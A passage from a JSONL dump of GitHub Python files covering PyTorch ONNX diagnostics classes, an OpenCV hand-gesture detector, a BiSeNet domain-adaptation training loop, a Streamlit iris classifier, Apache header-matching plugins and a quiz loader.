names.\" However it is not\n reflected in the json file, and therefore not captured by the python representation.\n This patch adds additional **kwargs to the `__init__` method to allow recording\n arbitrary key/value pairs.\n \"\"\"\n\n def __init__(self, tags: Optional[List[str]] = None, **kwargs):\n super().__init__(tags=tags)\n self.__dict__.update(kwargs)\n\n\n@dataclasses.dataclass(frozen=True)\nclass Rule:\n id: str\n name: str\n message_default_template: str\n short_description: Optional[str] = None\n full_description: Optional[str] = None\n full_description_markdown: Optional[str] = None\n help_uri: Optional[str] = None\n\n @classmethod\n def from_sarif(cls, **kwargs):\n \"\"\"Returns a rule from the SARIF reporting descriptor.\"\"\"\n short_description = kwargs.get(\"short_description\", {}).get(\"text\")\n full_description = kwargs.get(\"full_description\", {}).get(\"text\")\n full_description_markdown = kwargs.get(\"full_description\", {}).get(\"markdown\")\n help_uri = kwargs.get(\"help_uri\")\n\n rule = cls(\n id=kwargs[\"id\"],\n name=kwargs[\"name\"],\n message_default_template=kwargs[\"message_strings\"][\"default\"][\"text\"],\n short_description=short_description,\n full_description=full_description,\n full_description_markdown=full_description_markdown,\n help_uri=help_uri,\n )\n return rule\n\n def sarif(self) -> sarif.ReportingDescriptor:\n \"\"\"Returns a SARIF reporting descriptor of this Rule.\"\"\"\n short_description = (\n sarif.MultiformatMessageString(text=self.short_description)\n if self.short_description is not None\n else None\n )\n full_description = (\n sarif.MultiformatMessageString(\n text=self.full_description, markdown=self.full_description_markdown\n )\n if self.full_description is not None\n else None\n )\n return sarif.ReportingDescriptor(\n id=self.id,\n name=self.name,\n short_description=short_description,\n full_description=full_description,\n help_uri=self.help_uri,\n )\n\n def format_message(self, *args, **kwargs) -> str:\n \"\"\"Returns the formatted default message of this Rule.\n\n This method should be overridden (with code generation) by subclasses to reflect\n the exact arguments needed by the message template. This is a helper method to\n create the default message for a diagnostic.\n \"\"\"\n return self.message_default_template.format(*args, **kwargs)\n\n def pretty_print(self):\n pass\n\n\n@dataclasses.dataclass\nclass Location:\n uri: Optional[str] = None\n line: Optional[int] = None\n message: Optional[str] = None\n start_column: Optional[int] = None\n end_column: Optional[int] = None\n snippet: Optional[str] = None\n\n def sarif(self) -> sarif.Location:\n \"\"\"Returns the SARIF representation of this location.\"\"\"\n return sarif.Location(\n physical_location=sarif.PhysicalLocation(\n artifact_location=sarif.ArtifactLocation(uri=self.uri),\n region=sarif.Region(\n start_line=self.line,\n start_column=self.start_column,\n end_column=self.end_column,\n snippet=sarif.ArtifactContent(text=self.snippet),\n ),\n ),\n message=sarif.Message(text=self.message)\n if self.message is not None\n else None,\n )\n\n def pretty_print(self):\n \"\"\"Prints the location in a human-readable format.\"\"\"\n location_strs = [\"frame:\"]\n if self.snippet is not None:\n location_strs.append(self.snippet)\n if self.uri is not None:\n line_strs = [self.uri]\n line_strs.append(str(self.line)) if self.line is not None else \"-1\"\n line_strs.append(\n str(self.start_column)\n ) if self.start_column is not None else \"-1\"\n line_strs.append(\n str(self.end_column)\n ) if self.end_column is not None else \"-1\"\n location_strs.append(\":\".join(line_strs))\n if self.message is not None:\n location_strs.append(f\"({self.message})\")\n print(\" \".join(location_strs))\n\n\n@dataclasses.dataclass\nclass StackFrame:\n location: Location\n\n def sarif(self) -> sarif.StackFrame:\n \"\"\"Returns the SARIF representation of this stack frame.\"\"\"\n return sarif.StackFrame(location=self.location.sarif())\n\n def pretty_print(self):\n \"\"\"Prints the stack frame in a human-readable format.\"\"\"\n self.location.pretty_print()\n\n\n@dataclasses.dataclass\nclass Stack:\n frames: List[StackFrame] = dataclasses.field(default_factory=list)\n message: Optional[str] = None\n\n def sarif(self) -> sarif.Stack:\n \"\"\"Returns the SARIF representation of this stack.\"\"\"\n return sarif.Stack(\n frames=[frame.sarif() for frame in self.frames],\n message=sarif.Message(text=self.message)\n if self.message is not None\n else None,\n )\n\n def pretty_print(self):\n \"\"\"Prints the stack in a human-readable format.\"\"\"\n formatter.pretty_print_title(f\"Stack: {self.message}\", fill_char=\"-\")\n for frame in self.frames:\n frame.pretty_print()\n\n\n# This is a workaround for mypy not supporting Self from typing_extensions.\n_Diagnostic = TypeVar(\"_Diagnostic\", bound=\"Diagnostic\")\n\n\n@dataclasses.dataclass\nclass Graph:\n \"\"\"A graph of diagnostics.\n\n This class stores the string representation of a model graph.\n The `nodes` and `edges` fields are unused in the current implementation.\n \"\"\"\n\n graph_str: str\n name: str\n description: Optional[str] = None\n\n def sarif(self) -> sarif.Graph:\n \"\"\"Returns the SARIF representation of this graph.\"\"\"\n return sarif.Graph(\n description=sarif.Message(text=self.graph_str),\n properties=PatchedPropertyBag(name=self.name, description=self.description),\n )\n\n def pretty_print(self):\n pass\n\n\n@dataclasses.dataclass\nclass Diagnostic:\n rule: Rule\n level: Level\n message: Optional[str] = None\n locations: List[Location] = dataclasses.field(default_factory=list)\n stacks: List[Stack] = dataclasses.field(default_factory=list)\n graphs: List[Graph] = dataclasses.field(default_factory=list)\n additional_message: Optional[str] = None\n tags: List[Tag] = dataclasses.field(default_factory=list)\n\n def sarif(self) -> sarif.Result:\n \"\"\"Returns the SARIF Result representation of this diagnostic.\"\"\"\n message = self.message or self.rule.message_default_template\n if self.additional_message is not None:\n message = f\"{message}\\n{self.additional_message}\"\n sarif_result = sarif.Result(\n message=sarif.Message(text=message),\n level=self.level.name.lower(), # type: ignore[arg-type]\n rule_id=self.rule.id,\n )\n sarif_result.locations = [location.sarif() for location in self.locations]\n sarif_result.stacks = [stack.sarif() for stack in self.stacks]\n sarif_result.graphs = [graph.sarif() for graph in self.graphs]\n sarif_result.properties = sarif.PropertyBag(\n tags=[tag.value for tag in self.tags]\n )\n return sarif_result\n\n def with_location(self: _Diagnostic, location: Location) -> _Diagnostic:\n \"\"\"Adds a location to the diagnostic.\"\"\"\n self.locations.append(location)\n return self\n\n def with_stack(self: _Diagnostic, stack: Stack) -> _Diagnostic:\n \"\"\"Adds a stack to the diagnostic.\"\"\"\n self.stacks.append(stack)\n return self\n\n def with_graph(self: _Diagnostic, graph: Graph) -> _Diagnostic:\n \"\"\"Adds a graph to the diagnostic.\"\"\"\n self.graphs.append(graph)\n return self\n\n def with_additional_message(self: _Diagnostic, message: str) -> _Diagnostic:\n \"\"\"Adds an additional message to the diagnostic.\"\"\"\n if self.additional_message is None:\n self.additional_message = message\n else:\n self.additional_message = f\"{self.additional_message}\\n{message}\"\n return self\n\n def pretty_print(self, verbose: bool = False, log_level: Level = Level.ERROR):\n \"\"\"Prints the diagnostics in a human-readable format.\n\n Args:\n verbose: If True, prints all information. E.g. stack frames, graphs, etc.\n Otherwise, only prints compact information. E.g., rule name and display message.\n level: The minimum level of diagnostics to print.\n \"\"\"\n if self.level.value < log_level.value:\n return\n formatter.pretty_print_item_title(f\"{self.level.name}: {self.rule.name}\")\n print(self.message)\n\n if not verbose:\n print(\"\\n\")\n return\n\n for location in self.locations:\n location.pretty_print()\n for stack in self.stacks:\n stack.pretty_print()\n for graph in self.graphs:\n graph.pretty_print()\n print()\n\n\n@dataclasses.dataclass\nclass RuleCollection:\n _rule_id_name_set: FrozenSet[Tuple[str, str]] = dataclasses.field(init=False)\n\n def __post_init__(self) -> None:\n self._rule_id_name_set = frozenset(\n {\n (field.default.id, field.default.name)\n for field in dataclasses.fields(self)\n if isinstance(field.default, Rule)\n }\n )\n\n def __contains__(self, rule: Rule) -> bool:\n \"\"\"Checks if the rule is in the collection.\"\"\"\n return (rule.id, rule.name) in self._rule_id_name_set\n\n @classmethod\n def custom_collection_from_list(\n cls, new_collection_class_name: str, rules: Sequence[Rule]\n ) -> RuleCollection:\n \"\"\"Creates a custom class inherited from RuleCollection with the list of rules.\"\"\"\n return dataclasses.make_dataclass(\n new_collection_class_name,\n [\n (\n formatter.kebab_case_to_snake_case(rule.name),\n type(rule),\n dataclasses.field(default=rule),\n )\n for rule in rules\n ],\n bases=(cls,),\n )()\n\n\nclass Invocation:\n # TODO: Implement this.\n def __init__(self) -> None:\n raise NotImplementedError()\n\n\n@dataclasses.dataclass\nclass DiagnosticOptions:\n \"\"\"\n Options for diagnostic context.\n \"\"\"\n\n log_verbose: bool = dataclasses.field(default=False)\n log_level: Level = dataclasses.field(default=Level.ERROR)\n\n\n@dataclasses.dataclass\nclass DiagnosticContext:\n name: str\n version: str\n options: DiagnosticOptions = dataclasses.field(default_factory=DiagnosticOptions)\n diagnostic_type: Type[Diagnostic] = dataclasses.field(default=Diagnostic)\n diagnostics: List[Diagnostic] = dataclasses.field(init=False, default_factory=list)\n _invocation: Invocation = dataclasses.field(init=False)\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n return True\n\n def sarif(self) -> sarif.Run:\n \"\"\"Returns the SARIF Run object.\"\"\"\n return sarif.Run(\n tool=sarif.Tool(\n driver=sarif.ToolComponent(\n name=self.name,\n version=self.version,\n rules=[diagnostic.rule.sarif() for diagnostic in self.diagnostics],\n )\n ),\n results=[diagnostic.sarif() for diagnostic in self.diagnostics],\n )\n\n def add_diagnostic(self, diagnostic: Diagnostic) -> None:\n \"\"\"Adds a diagnostic to the context.\n\n Use this method to add diagnostics that are not created by the context.\n Args:\n diagnostic: The diagnostic to add.\n \"\"\"\n if not isinstance(diagnostic, self.diagnostic_type):\n raise TypeError(\n f\"Expected diagnostic of type {self.diagnostic_type}, got {type(diagnostic)}\"\n )\n self.diagnostics.append(diagnostic)\n\n def diagnose(\n self,\n rule: Rule,\n level: Level,\n message: Optional[str] = None,\n **kwargs,\n ) -> Diagnostic:\n \"\"\"Creates a diagnostic for the given arguments.\n\n Args:\n rule: The rule that triggered the diagnostic.\n level: The level of the diagnostic.\n message: The message of the diagnostic.\n **kwargs: Additional arguments to pass to the Diagnostic constructor.\n\n Returns:\n The created diagnostic.\n\n Raises:\n ValueError: If the rule is not supported by the tool.\n \"\"\"\n diagnostic = self.diagnostic_type(rule, level, message, **kwargs)\n self.add_diagnostic(diagnostic)\n return diagnostic\n\n def pretty_print(\n self, verbose: bool = False, log_level: Level = Level.ERROR\n ) -> None:\n \"\"\"Prints the diagnostics in a human-readable format.\n\n Args:\n verbose: Whether to print the diagnostics in verbose mode. See Diagnostic.pretty_print.\n level: The minimum level of diagnostics to print.\n \"\"\"\n formatter.pretty_print_title(\n f\"Diagnostic Run {self.name} version {self.version}\"\n )\n print(f\"verbose: {verbose}, log level: {log_level}\")\n diagnostic_stats = {level: 0 for level in Level}\n for diagnostic in self.diagnostics:\n diagnostic_stats[diagnostic.level] += 1\n formatter.pretty_print_title(\n \" \".join(f\"{diagnostic_stats[level]} {level.name}\" for level in Level)\n )\n\n for diagnostic in self.diagnostics:\n diagnostic.pretty_print(verbose, log_level)\n\n unprinted_diagnostic_stats = [\n (level, count)\n for level, count in diagnostic_stats.items()\n if count > 0 and level.value < log_level.value\n ]\n if unprinted_diagnostic_stats:\n print(\n f\"{' '.join(f'{count} {level.name}' for level, count in unprinted_diagnostic_stats)} \"\n \"were not printed due to the log level.\"\n )\n print()\n","repo_name":"robit-man/AGX-ORIN-TORCH-PACKAGES","sub_path":"site-packages/torch/onnx/_internal/diagnostics/infra/_infra.py","file_name":"_infra.py","file_ext":"py","file_size_in_byte":15496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28184457145","text":"from tensorflow.keras.applications.mobilenet_v2 import preprocess_input\nfrom tensorflow.keras.models import load_model\nimport cv2 as cv\nimport numpy as np\nimport os\n\n# 얼굴 검출을 위한 Haar-Cascade 트레이닝 데이터를 읽어 CascadeClassifier 객체를 생성\ncascade = cv.CascadeClassifier(cv.samples.findFile(\"haarcascade_frontalface_alt.xml\")) # 사람 얼굴 정면에 대한 Haar-Cascade 학습 데이터\n\n# 손가락을 식별하는 모델 ���출\nmodel = load_model('hand_detect_model2.h5')\n\n# VideoCapture 객체 생성\ncap = cv.VideoCapture(0)\n\n# 라이브로 들어오는 비디오를 frame 별로 캡쳐하고 이를 화면에 display\nwhile True:\n\n # 재생되는 비디오의 한 frame씩 읽기\n ret, img = cap.read()\n # 비디오 프레임을 제대로 읽었다면 ret 값이 True가 되고 실패하면 False\n if ret == False:\n break\n\n img_result = img.copy()\n # 이미지 흑백처리\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n # 히스토그램 평활화(Histogram Equalization)를 적용하여 이미지의 콘트라스트를 향상시킴\n gray = cv.equalizeHist(gray)\n\n # 얼굴 위치를 리스트로 리턴 (x, y, w, h) / (x, y ):얼굴의 좌상단 위치, (w, h): 가로 세로 크기\n rects = cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5, minSize=(30, 30),\n flags=cv.CASCADE_SCALE_IMAGE)\n\n # 얼굴 영역에 검정 사각형 만들기\n height, width = img.shape[:2]\n for x1, y1, x2, y2 in rects:\n cv.rectangle(img, (x1 - 10, 0), (x1+x2+10, height), (0, 0, 0), -1)\n\n # bgr -> hsv 로 변환\n img_hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n\n # Skin HSV 범위 지정\n low = (0, 30, 0)\n high = (15, 255, 255)\n\n # 이미지를 binary 이미지로 전환\n img_binary = cv.inRange(img_hsv, low, high)\n\n # 경계선 찾기\n kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (5, 5))\n img_binary = cv.morphologyEx(img_binary, cv.MORPH_CLOSE, kernel, 1)\n\n # binary 이미지에서 윤곽선을 검색\n contours, hierarchy = cv.findContours(img_binary, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n\n max_contour = None\n max_area = -1\n\n # 영익이 가장 큰 윤곽선을 선택 : 손 검출\n for contour in contours:\n area = cv.contourArea(contour)\n x, y, w, h = cv.boundingRect(contour)\n if (w * h) * 0.4 > area:\n continue\n if w > h:\n continue\n if area > max_area:\n max_area = area\n max_contour = contour\n\n if max_area < 10000:\n max_area = -1\n\n # 검출된 윤곽선을 그린다\n cv.drawContours(img_result, [max_contour], 0, (255, 0, 0), 3)\n\n # 손 영역의 위치 값을 찾는다\n contours_xy = np.array(max_contour)\n # x의 min과 max 찾기\n x_min, x_max = 0, 0\n value = list()\n for i in range(len(contours_xy)):\n value.append(contours_xy[i][0][0]) # 네번째 괄호가 0일때 x의 값\n x_min = min(value)\n x_max = max(value)\n # y의 min과 max 찾기\n y_min, y_max = 0, 0\n value = list()\n for i in range(len(contours_xy)):\n value.append(contours_xy[i][0][1]) # 네번째 괄호가 0일때 x의 값\n y_min = min(value)\n y_max = max(value)\n\n # frame에서 손 영역만 자른다\n x = x_min\n y = y_min\n w = x_max - x_min\n h = y_max - y_min\n img_trim = img[y_min-10:y_max+10, x_min-10:x_max+10]\n\n # 손 영역 이미지에서 손가락 검출 모델을 이용하여 손가락 모양을 예측한다\n try:\n hand_input = cv.resize(img_trim, (128, 128))\n hand_input = np.expand_dims(hand_input, axis=0)\n hand_input = np.array(hand_input)\n cv.imshow(\"Result\", img_result)\n predictions = model.predict(hand_input)\n print(\"predict : \", np.argmax(predictions)) # frame에서 손 영역에 윤곽선을 그린 이미지를 반환\n #cv.imshow(\"Result\", img_trim) # frame에서 손 영역을 자른 이미지를 반환\n cv.waitKey(100)\n except:\n print(\"손을 인식하지 못했습니다.\")\n continue","repo_name":"LeeeJooo/FingerPOSErecognition","sub_path":"mainVideo2.py","file_name":"mainVideo2.py","file_ext":"py","file_size_in_byte":4152,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22013379095","text":"import argparse\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\nimport os\nfrom model.build_BiSeNet import BiSeNet\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport torch\nfrom tensorboardX import SummaryWriter\nfrom tqdm import tqdm\nimport numpy as np\nfrom utils import poly_lr_scheduler, reverse_one_hot, compute_global_accuracy, fast_hist, per_class_iu\nimport torch.cuda.amp as amp\nfrom dataset.cityscapes_dataset import cityscapesDataSet\nfrom dataset.gta5_dataset import gta5DataSet\nfrom model.discriminator import FCDiscriminator\nfrom model.discriminator_dsc import DSCDiscriminator\nfrom utils import upload_model, best_model\nfrom arguments import get_args\n\ndef val(args, model, dataloader):\n print('start val!')\n \n with torch.no_grad():\n model.eval()\n precision_record = []\n hist = np.zeros((args.num_classes, args.num_classes))\n\n for i, (data,label,_,_) in enumerate(dataloader):\n \n label = label.type(torch.LongTensor)\n data = data.cuda()\n label = label.long().cuda()\n\n # get RGB predict image\n predict = model(data).squeeze()\n predict = reverse_one_hot(predict)\n predict = np.array(predict.cpu())\n\n # get RGB label image\n label = label.squeeze()\n if args.loss == 'dice':\n label = reverse_one_hot(label)\n label = np.array(label.cpu())\n\n # compute per pixel accuracy\n precision = compute_global_accuracy(predict, label)\n hist += fast_hist(label.flatten(), predict.flatten(), args.num_classes)\n\n # there is no need to transform the one-hot array to visual RGB array\n precision_record.append(precision)\n \n precision = np.mean(precision_record)\n miou_list = per_class_iu(hist)\n miou = np.mean(miou_list)\n print('precision per pixel for test: %.3f' % precision)\n print('mIoU for validation: %.3f' % miou)\n print(f'mIoU per class: {miou_list}')\n\n return precision, miou\n\n\ndef train(args, model, optimizer, dataloader_source, dataloader_target, dataloader_val, model_D, optimizer_D, IMG_MEAN, cropSize):\n writer = SummaryWriter(comment=''.format(args.optimizer, args.context_path))\n\n scaler = amp.GradScaler()\n discriminator_scaler = amp.GradScaler()\n # Loss\n bce_loss = torch.nn.BCEWithLogitsLoss()\n loss_func = torch.nn.CrossEntropyLoss(ignore_index=255)\n \n source_label = 0\n target_label = 1 \n max_miou = 0\n step = 0\n\n for epoch in range(args.num_epochs):\n\n \n lr = poly_lr_scheduler(optimizer, args.learning_rate, iter=epoch, max_iter=args.num_epochs, power = args.power) \n discriminator_lr = poly_lr_scheduler(optimizer_D, args.learning_rateD, iter=epoch, max_iter=args.num_epochs, power = args.power) \n \n \n model.train()\n model_D.train()\n\n total=len(dataloader_source) * args.batch_size\n tq = tqdm(total=total)\n tq.set_description('epoch %d, lr %f'% (epoch , lr))\n \n \n loss_record_source = []\n loss_record_target = []\n loss_D_record = []\n\n source_iter = enumerate(dataloader_source)\n target_iter = enumerate(dataloader_target)\n\n for batch_source, batch_target in zip(source_iter, target_iter):\n \n _, (data_source, label_source, _, _) = batch_source\n \n \n _, (data_target, label_target, _, _) = batch_target\n \n \n optimizer.zero_grad()\n optimizer_D.zero_grad()\n\n # Train Segmentation network\n for param in model_D.parameters():\n param.requires_grad = False\n\n # Train with source\n data_source = data_source.cuda()\n label_source = label_source.long().cuda()\n\n with amp.autocast():\n output, output_sup1, output_sup2 = model(data_source)\n loss1 = loss_func(output, label_source)\n loss2 = loss_func(output_sup1, label_source)\n loss3 = loss_func(output_sup2, label_source)\n loss_segmentation_source = loss1 + loss2 + loss3 #LOSS SEGMENTATION\n \n scaler.scale(loss_segmentation_source).backward()\n \n\n # Train with target\n data_target = data_target.cuda()\n\n if args.use_pseudolabels==1:\n label_target = label_target.long().cuda()\n\n with amp.autocast(): \n output_target, output_sup1_t, output_sup2_t = model(data_target)\n if args.use_pseudolabels==1:\n loss1_t = loss_func(output_target, label_target)\n loss2_t = loss_func(output_sup1_t, label_target)\n loss3_t = loss_func(output_sup2_t, label_target)\n loss_seg_target = loss1_t + loss2_t + loss3_t\n\n else:\n loss_seg_target = 0\n\n \n D_out=model_D(F.softmax(output_target, dim=1)) \n loss_adversarial = bce_loss(D_out, Variable(torch.FloatTensor(D_out.data.size()).fill_(source_label)).cuda()) \n loss_target = args.lambda_adv * loss_adversarial + loss_seg_target #LOSS ADVERSARIAL \n \n scaler.scale(loss_target).backward()\n \n\n # train D\n\n # bring back requires_grad\n for param in model_D.parameters():\n param.requires_grad = True\n\n # Train D with source\n with amp.autocast():\n output_source = output.detach()\n D_out = model_D(F.softmax(output_source, dim =1))\n loss_D_source = bce_loss(D_out, Variable(torch.FloatTensor(D_out.data.size()).fill_(source_label)).cuda())\n\n # Train D with target\n with amp.autocast():\n output_target = output_target.detach()\n D_out = model_D(F.softmax(output_target, dim=1))\n loss_D_target = bce_loss(D_out, Variable(torch.FloatTensor(D_out.data.size()).fill_(target_label)).cuda()) \n \n loss_D = loss_D_source/2 + loss_D_target/2\n\n discriminator_scaler.scale(loss_D).backward()\n\n discriminator_scaler.step(optimizer_D)\n scaler.step(optimizer)\n\n discriminator_scaler.update()\n scaler.update()\n\n\n tq.update(args.batch_size)\n \n\n tq.set_postfix(loss_segmentation_source='%.6f' % loss_segmentation_source, loss_target='%.6f' % loss_target, loss_D='%.6f' % loss_D)\n step += 1\n writer.add_scalar('loss_seg_source_step', loss_segmentation_source, step)\n writer.add_scalar('loss_target_step', loss_target, step)\n writer.add_scalar('loss_D_step', loss_D, step)\n \n loss_record_source.append(loss_segmentation_source.item())\n loss_record_target.append(loss_target.item())\n loss_D_record.append(loss_D.item())\n\n \n tq.close() \n loss_train_mean_source = np.mean(loss_record_source)\n writer.add_scalar('epoch/loss_epoch_train', float(loss_train_mean_source), epoch)\n print('loss for train source : %f' % (loss_train_mean_source))\n\n loss_train_mean_target = np.mean(loss_record_target)\n writer.add_scalar('epoch/loss_epoch_train', float(loss_train_mean_target), epoch)\n print('loss for train target : %f' % (loss_train_mean_target))\n\n loss_D_mean = np.mean(loss_D_record)\n writer.add_scalar('epoch/loss_', float(loss_D_mean), epoch)\n print('loss for discriminator : %f' % (loss_D_mean))\n\n if epoch % args.validation_step == 0 and epoch != 0:\n precision, miou = val(args, model, dataloader_val)\n if miou > max_miou:\n max_miou = miou\n import os \n os.makedirs(args.save_model_path, exist_ok=True)\n best_model(args, model, model_D, optimizer, optimizer_D, epoch, \"best_model\")\n \n writer.add_scalar('epoch/precision_val', precision, epoch)\n writer.add_scalar('epoch/miou val', miou, epoch)\n \n \n \n\ndef main(params):\n args, IMG_MEAN = get_args(params)\n\n #sistema\n cropSize= (args.crop_width , args.crop_height)\n cropSizeGTA5 = (1280,720)\n \n # Create dataset train GTA \n dataset_train_source = gta5DataSet(args.source, args.path_source, crop_size=cropSizeGTA5)\n dataloader_source = DataLoader(dataset_train_source,\n batch_size=args.batch_size,\n shuffle=True,\n num_workers = args.num_workers)\n \n if args.use_pseudolabels == 1:\n args.checkpoint_name_save = args.checkpoint_name_save.replace(\".pth\", \"_ssl.pth\")\n \n\n if args.use_pseudolabels == 0:\n dataset_train_target = cityscapesDataSet(args.dataset, args.data_train, crop_size=cropSize)\n\n dataloader_target = DataLoader(dataset_train_target,\n batch_size=args.batch_size,\n shuffle=True,\n num_workers = args.num_workers\n )\n else: \n print('entrato nel dataset_train_target delle pseudo')\n dataset_train_target = cityscapesDataSet(args.dataset, args.data_train, crop_size=cropSize, pseudo_path= args.pseudo_path, use_pseudolabels = 1, encodeseg= 0)\n \n dataloader_target = DataLoader(dataset_train_target,\n batch_size= args.batch_size,\n shuffle=True,\n num_workers = args.num_workers, \n )\n\n dataset_val = cityscapesDataSet(args.dataset, args.data_val, crop_size=cropSize, use_pseudolabels=0, encodeseg =1 )\n dataloader_val = DataLoader(dataset_val,\n batch_size= 1,\n shuffle=True,\n num_workers = args.num_workers, \n ) \n\n \n # build model\n os.environ['CUDA_VISIBLE_DEVICES'] = args.cuda\n model = BiSeNet(args.num_classes, args.context_path)\n \n if(args.Discriminator==0): \n print('entrato Discriminator 0') \n model_D = FCDiscriminator(num_classes=args.num_classes)\n else: #uso quello light weight \n print('entrato Discriminator 1')\n model_D= DSCDiscriminator(num_classes=args.num_classes) \n\n if torch.cuda.is_available() and args.use_gpu:\n model_D = torch.nn.DataParallel(model_D).cuda()\n model = torch.nn.DataParallel(model).cuda()\n \n \n \n # build optimizers\n \n optimizer_D = optim.Adam(model_D.parameters(), lr=args.learning_rateD, betas=(0.9, 0.99)) \n optimizer = torch.optim.SGD(model.parameters(), args.learning_rate, momentum=0.9, weight_decay=1e-4)\n \n\n \n if args.use_pretrained_model ==1 : \n model, model_D, optimizer, optimizer_D, epoch_start = upload_model(args, model, model_D, optimizer, optimizer_D) \n else:\n train(args, model, optimizer, dataloader_source, dataloader_target, dataloader_val, model_D, optimizer_D, IMG_MEAN, cropSize)\n \n \n val(args, model, dataloader_val)\n \nif __name__ == '__main__':\n params = [\n '--use_pseudolabels','0',\n '--save_dir_plabels', '/content/drive/MyDrive/dataset/pseudolabels',\n '--pseudo_path', './dataset/pseudolabels/labels',\n '--num_epochs', '50',\n '--learning_rate', '2.5e-4',\n '--data_train', './dataset/data/Cityscapes/train.txt',\n '--data_val', './dataset/data/Cityscapes/val.txt',\n '--num_workers', '4',\n '--num_classes', '19',\n '--cuda', '0',\n '--batch_size', '4',\n '--save_model_path', './checkpoints_101_sgd',\n '--context_path', 'resnet101', # set resnet18 or resnet101, only support resnet18 and resnet101\n '--optimizer', 'sgd',\n '--Discriminator', '1',\n '--use_pretrained_model','0',\n '--checkpoint_name_save','model_output.pth',\n '--checkpoint_name_load','model_output_best.pth'\n\n ]\n\n\nmain(params)","repo_name":"micolrosini/Real-Time-Domain-Adaptation-in-Image-Segmentation","sub_path":"trainUnsupervised.py","file_name":"trainUnsupervised.py","file_ext":"py","file_size_in_byte":12357,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"38296554351","text":"from altair.vegalite.v4.schema.channels import X\r\nimport streamlit as st\r\n#importing necessary libraries\r\nfrom sklearn.datasets import load_iris\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.metrics import confusion_matrix\r\nimport seaborn as sb\r\n\r\nst.title(\"Iris Flower Predictor\")\r\nst.header(\"Enter Your Data: \")\r\n\r\ndef user_input():\r\n sepal_length =st.slider('Sepal Length',0.0,10.0,5.0)\r\n sepal_width = st.slider('Sepal Width',0.0,10.0,5.0)\r\n petal_length =st.slider('Petal Length',0.0,10.0,5.0)\r\n petal_width =st.slider('Petal Width',0.0,10.0,5.0)\r\n data = {\"Sepal Length\":sepal_length,\r\n \"Sepal Width\": sepal_width,\r\n \"Petal Length\": petal_length,\r\n \"Petal Width\": petal_width\r\n }\r\n features = pd.DataFrame(data, index=[0])\r\n return features\r\ndf = user_input()\r\n\r\nst.subheader(\"User Input\")\r\nst.write(df) \r\n\r\nflowers = load_iris()\r\nX = flowers.data\r\nY = flowers.target\r\nmodel = LogisticRegression()\r\nmodel.fit(X,Y)\r\npredicted_flower = model.predict(df)\r\npred_values = model.predict(X)\r\nscore = str(model.score(X,Y)*100)\r\n\r\n\r\nst.subheader(\"Predicted Flower:\")\r\nst.write(pd.DataFrame(flowers.target_names[predicted_flower]))\r\n\r\nst.subheader(\"Model Accuracy:\")\r\nst.write(score + \"%\")\r\n\r\n\r\nst.set_option('deprecation.showPyplotGlobalUse', False)\r\n\r\nst.subheader(\"Confustion Matrix:\")\r\ncm = confusion_matrix(Y,pred_values)\r\nsb.heatmap(cm,annot=True)\r\nplt.xlabel(\"Predicted\")\r\nplt.ylabel(\"True\")\r\nst.pyplot()\r\n\r\n","repo_name":"nilu-24/iris_predictor","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42573172994","text":"from detectem.plugin import Plugin\n\n\nclass ApachePlugin(Plugin):\n name = 'apache'\n homepage = 'http://httpd.apache.org/'\n matchers = [\n {'header': ('Server', 'Apache/(?P[0-9\\.]+)')},\n ]\n\n\nclass ApacheCoyotePlugin(Plugin):\n name = 'apache-coyote'\n homepage = 'http://httpd.apache.org/'\n matchers = [\n {'header': ('Server', 'Apache-Coyote/(?P[0-9\\.]+)')},\n ]\n\n\nclass ApacheModbwlimitedPlugin(Plugin):\n name = 'apache-mod_bwlimited'\n homepage = 'http://cpanel.com/' # It comes with cpanel\n matchers = [\n {'header': ('Server', 'mod_bwlimited/(?P[0-9\\.]+)')},\n ]\n\n\nclass ApacheModfcgidPlugin(Plugin):\n name = 'apache-mod_fcgid'\n homepage = 'https://httpd.apache.org/mod_fcgid/'\n matchers = [\n {'header': ('Server', 'mod_fcgid/(?P[0-9\\.]+)')},\n ]\n","repo_name":"rtobar/detectem","sub_path":"detectem/plugins/infraestructure/apache.py","file_name":"apache.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"73636332267","text":"#!/usr/bin/env python2\n# -*- coding: UTF-8 -*-\n\"\"\"\n Complexity: quizzes/__init__.py\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n The core functions for working with quizzes.\n\n\"\"\"\n\nimport os\nimport uuid\nfrom pkgutil import iter_modules\n\nSHELVE_INSTANCE_PREFIX = 'quiz-'\n\n# Get the quizzes package's path.\nquizzes_path = os.path.dirname(__file__)\n\n# Find all quiz modules.\nquiz_modules = [\n module for _, module, _ in iter_modules([quizzes_path])\n]\n\n# Create name (replace '_' with spaces and make title case).\nquiz_names = [\n module.replace('_', ' ').title() for module in quiz_modules\n]\n\n# Generate dictionary of quizzes and there names.\nquizzes = {\n name: module\n for name in quiz_names\n for module in quiz_modules\n}\n\n# For reverse lookup.\nquizzes_rev = {v: k for k, v in quizzes.items()}\n\ndef load_quiz(quiz_module):\n \"\"\"\n Load Quiz class for given module.\n \n :param quiz_module: Name of module that contains `Quiz` class\n in the package `quizzes`.\n :type quiz_module: str\n\n :returns: The `Quiz` class from `quiz_module`.\n \"\"\"\n\n # TODO: When additional modules exist, load dynamically based on\n # `quiz_modulus`.\n from the_modulus import Quiz\n\n return Quiz\n\n\nclass BaseQuiz(object):\n \"\"\"\n Base Quiz object that 